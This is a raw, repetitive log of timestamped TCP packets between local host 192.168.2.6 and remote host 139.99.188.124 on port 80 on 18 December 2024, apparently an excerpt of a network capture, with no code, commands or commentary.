                                                                    Dec 18, 2024 09:19:24.514303923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514316082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514336109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.514338017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.514338017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.516748905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.516829967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.516840935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.516846895 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519752026 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.519798040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519810915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519820929 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519831896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.519845009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522188902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.522188902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.522819042 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522831917 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.522851944 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.523029089 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.608715057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.640680075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.640868902 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.640948057 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.641216040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.641359091 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.641438961 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.642411947 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.642486095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.642635107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.644610882 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644648075 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644720078 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.644751072 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.644828081 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.645204067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.646693945 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.646729946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.646817923 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.647401094 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.647435904 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.648772001 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.648869991 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.648905993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649226904 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.649281025 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649327993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.649455070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.650316000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.650490046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.650635958 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.651449919 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.651554108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.651735067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.652559996 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.652729988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.652811050 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.653795004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.653851986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.653909922 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664314985 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664367914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664486885 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664560080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664805889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.664927959 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.664994955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.665930033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.666004896 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.666069031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.667002916 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.667167902 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.667387009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668476105 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668519020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.668636084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.669280052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.669347048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.669382095 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.670377970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.670592070 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.670805931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671629906 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671670914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.671689034 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.672677994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.672749043 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.672816992 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.673789978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.673830986 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.673840046 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675008059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675043106 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.675054073 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.676124096 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.676140070 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.676167011 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.677074909 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.677114964 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.677148104 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678276062 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678287029 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.678327084 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.679254055 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.679353952 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.679486990 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.680382967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.680465937 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.680490971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.681478977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.681519985 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.681569099 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.682610035 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.682764053 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.682795048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.683753967 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.683962107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.684206009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.684819937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.684947014 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.684984922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.685971975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.686021090 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.686060905 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.687077045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.687122107 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.687172890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688297033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688396931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.688474894 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.689610004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.689629078 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.689691067 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.690684080 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.690704107 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.690746069 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.691586971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.691690922 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.691725969 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693254948 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693274975 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.693356991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.694123983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.694143057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.694293022 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.695187092 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.695205927 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.695281029 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.696799040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.696815014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697371960 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.697741032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697761059 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.697823048 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.698473930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.698488951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.698539019 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.699362040 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.699470043 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.699575901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702831030 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702847958 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702860117 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702871084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702883959 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.702934027 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.703088999 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.703350067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.703982115 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.703994989 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.704332113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.705039024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.705224991 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.706146955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.706162930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.706471920 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.707381010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707393885 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707407951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.707509995 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.708791971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.708805084 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.708916903 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.709858894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.709871054 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.709944963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.710627079 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.711419106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.833863974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833883047 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833894014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833904982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833916903 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833928108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833940983 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.833988905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.833988905 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.837522984 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837534904 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837544918 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837555885 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837568045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837579012 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.837596893 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.837596893 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.837706089 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.839694977 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.839705944 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.839718103 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.839730978 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.839766979 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.839900017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.840802908 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.840815067 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.841021061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.841645002 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.841697931 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.841748953 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.842684984 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.843765020 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.843792915 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.846852064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.846868992 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.846904039 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.846915007 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.847141981 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.847141981 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.855815887 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.855829000 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.855839014 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.855850935 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.856165886 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.856165886 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.858848095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.858864069 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.858875036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.858885050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.859011889 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.859011889 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.861989021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862035036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862046957 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862056971 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862067938 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862077951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.862086058 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.864747047 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.864784002 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.864794970 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.864805937 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.864815950 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.864825964 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.864837885 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.866214037 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.866214037 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.867549896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.867561102 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.867572069 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.867583036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.867599010 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.867659092 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.868031979 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.868042946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.868076086 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.869977951 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.869990110 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.870780945 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.870815039 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.870826960 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.871011972 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.874016047 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874032021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874042988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874053001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874063969 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874073982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.874088049 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.874521017 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.875375032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.875386953 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.876614094 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.876656055 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.876668930 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.876744032 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.877758980 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.877770901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.878372908 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.878388882 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.878401995 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.878446102 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.879338026 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.879348993 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.879419088 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.882693052 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882740974 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882751942 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882761955 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882775068 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882785082 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.882898092 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.882898092 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.886262894 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886275053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886286020 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886296988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886307001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886318922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.886373997 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.886373997 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.886373997 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.887068987 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.887080908 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.887415886 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.888151884 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.888164043 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.888219118 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.889190912 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.890638113 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.890660048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.890671015 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.890681982 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.890851021 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.891347885 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.891455889 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.891477108 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894764900 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894782066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894793987 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894804001 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894815922 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:24.894819021 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:24.894826889 CET8049738139.99.188.124192.168.2.6
